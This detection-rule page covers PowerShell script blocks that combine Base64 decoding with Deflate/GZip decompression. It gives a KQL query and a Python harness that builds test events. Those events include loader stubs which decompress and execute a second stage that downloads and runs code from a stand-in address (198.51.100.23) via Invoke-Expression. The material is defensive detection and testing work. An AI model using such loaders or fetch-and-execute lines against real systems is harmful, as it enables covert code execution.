LoFP / Legitimate PowerShell scripts that reconstruct to a confirmed benign installer, updater, or administrative workflow for the same user and host scope.

Techniques

Sample rules

PowerShell Suspicious Payload Encoded and Compressed

Description

Identifies PowerShell script block content that combines Base64 decoding with .NET decompression (Deflate/GZip). Attackers use this pattern to deobfuscate and reconstruct payloads in memory to evade defenses.

Detection logic

event.category:process and host.os.type:windows and
  powershell.file.script_block_entropy_bits >= 4.5 and
  powershell.file.script_block_text : (
    (
      "System.IO.Compression.DeflateStream" or
      "System.IO.Compression.GzipStream" or
      "IO.Compression.DeflateStream" or
      "IO.Compression.GzipStream"
    ) and
    FromBase64String
  ) and
  not user.id : "S-1-5-18"
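As an added example (not part of this page or of the rule's own project), the detection logic above re-implemented in Python and run over constructed script-block events, including the false-positive case stated at the top of the page. The marker strings, field names, threshold and SID exclusion are taken from the query; everything else is an assumption made here: the entropy field is computed as Shannon entropy in bits per character, case-insensitive substring matching stands in for KQL's match on an analysed text field, and the helpers (`loader_stub`, `reconstruct_payload`, `build_events`, `evaluate`), the sample scripts, the user SID and the 198.51.100.23 address are all constructed for illustration.

```python
import base64
import gzip
import math
import re
import zlib
from collections import Counter

# Local re-implementation of the query above. Assumptions: case-insensitive substring
# matching stands in for KQL's match on the analysed script_block_text field, and the
# entropy field is Shannon entropy in bits per character over the whole block.
DECOMPRESSION_MARKERS = ("system.io.compression.deflatestream", "system.io.compression.gzipstream",
                         "io.compression.deflatestream", "io.compression.gzipstream")
ENTROPY_THRESHOLD_BITS = 4.5
LOCAL_SYSTEM_SID = "S-1-5-18"  # excluded by the rule's final clause
B64_LITERAL = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)', re.I)


def shannon_entropy_bits(text: str) -> float:
    """Shannon entropy in bits per character; 0.0 for empty or single-symbol input."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


def matches_rule(event: dict) -> bool:
    """True when the event satisfies every clause of the detection logic."""
    if event.get("event.category") != "process" or event.get("host.os.type") != "windows":
        return False
    if event.get("user.id") == LOCAL_SYSTEM_SID:
        return False
    text = event.get("powershell.file.script_block_text", "")
    if shannon_entropy_bits(text) < ENTROPY_THRESHOLD_BITS:
        return False
    low = text.lower()
    return any(m in low for m in DECOMPRESSION_MARKERS) and "frombase64string" in low


def reconstruct_payload(script_text: str) -> list:
    """Triage helper (assumption): decode each literal Base64 argument and try GZip, then raw
    DEFLATE (what .NET DeflateStream reads), so the analyst sees what the block reconstructs to."""
    out = []
    for m in B64_LITERAL.finditer(script_text):
        raw = base64.b64decode(m.group(1))
        for name, fn in (("gzip", gzip.decompress), ("deflate", lambda b: zlib.decompress(b, -15))):
            try:
                out.append((name, fn(raw).decode("utf-8", "replace")))
                break
            except (OSError, EOFError, zlib.error):
                continue
    return out


def loader_stub(payload: str, stream_class: str) -> str:
    """Constructed loader in the shape the rule targets: Base64 -> decompress -> IEX."""
    if "gzip" in stream_class.lower():
        blob = gzip.compress(payload.encode())
    else:
        z = zlib.compressobj(wbits=-15)  # raw DEFLATE, no zlib header
        blob = z.compress(payload.encode()) + z.flush()
    return (f'$b = [Convert]::FromBase64String("{base64.b64encode(blob).decode()}")\n'
            "$ms = New-Object IO.MemoryStream(, $b)\n"
            f"$ds = New-Object {stream_class}($ms, [IO.Compression.CompressionMode]::Decompress)\n"
            "IEX (New-Object IO.StreamReader($ds)).ReadToEnd()\n")


# Constructed sample payloads and benign scripts; any text works, it only needs to round-trip.
SECOND_STAGE = ("$c = New-Object Net.WebClient\n"
                "$c.Headers.Add('User-Agent', 'Mozilla/5.0 (constructed sample)')\n"
                "Invoke-Expression $c.DownloadString('http://198.51.100.23/stage2')\n")
INSTALLER_BODY = ("# Contoso Agent installer (constructed stand-in for the LoFP case above)\n"
                  "$dest = Join-Path $env:ProgramFiles 'Contoso Agent'\n"
                  "New-Item -ItemType Directory -Path $dest -Force | Out-Null\n"
                  "Copy-Item -Path .\\agent.exe -Destination $dest\n")
GZ_LOG_READER = ("$gz = New-Object IO.Compression.GZipStream($fs, [IO.Compression.CompressionMode]::Decompress)\n"
                 "(New-Object IO.StreamReader($gz)).ReadToEnd() | Select-String 'ERROR'\n")
CERT_DECODE = "$raw = [Convert]::FromBase64String($certBlob)\n$cert.Import($raw)\n"


def build_events() -> list:
    """Constructed script-block events using the field names the query references."""
    def ev(name, text, sid="S-1-5-21-1000-2000-3000-1001"):
        return {"name": name, "event.category": "process", "host.os.type": "windows",
                "user.id": sid, "powershell.file.script_block_text": text}
    gz_loader = loader_stub(SECOND_STAGE, "IO.Compression.GZipStream")
    return [
        ev("gzip loader, interactive user", gz_loader),
        ev("deflate loader, interactive user", loader_stub(SECOND_STAGE, "System.IO.Compression.DeflateStream")),
        ev("gzip loader run as LocalSystem", gz_loader, sid=LOCAL_SYSTEM_SID),
        ev("benign .gz log reader, no Base64", GZ_LOG_READER),
        ev("benign certificate import, no decompression", CERT_DECODE),
        ev("installer embedding a compressed resource (LoFP case)",
           loader_stub(INSTALLER_BODY, "IO.Compression.GZipStream")),
    ]


def evaluate(events: list) -> dict:
    """Map each event name to whether the rule fires on it."""
    return {e["name"]: matches_rule(e) for e in events}
```

Running `evaluate(build_events())` fires on both loaders and on the installer, and stays quiet on the LocalSystem run, the `.gz` log reader (decompression without Base64) and the certificate import (Base64 without decompression). The installer hit is exactly the false positive described at the top of the page: the rule cannot tell a packed second stage from a packed installer resource, so the analyst step is `reconstruct_payload()` on the block and a check that what comes out is the expected installer, updater or admin workflow for that user and host. Two practical caveats: the actual .NET class is spelled `GZipStream`, so matching must be case-insensitive (KQL on an analysed field already is); and under plain substring matching the two `System.`-prefixed markers are redundant, whereas on an analysed field the four spellings cover the different ways the class name can be tokenised.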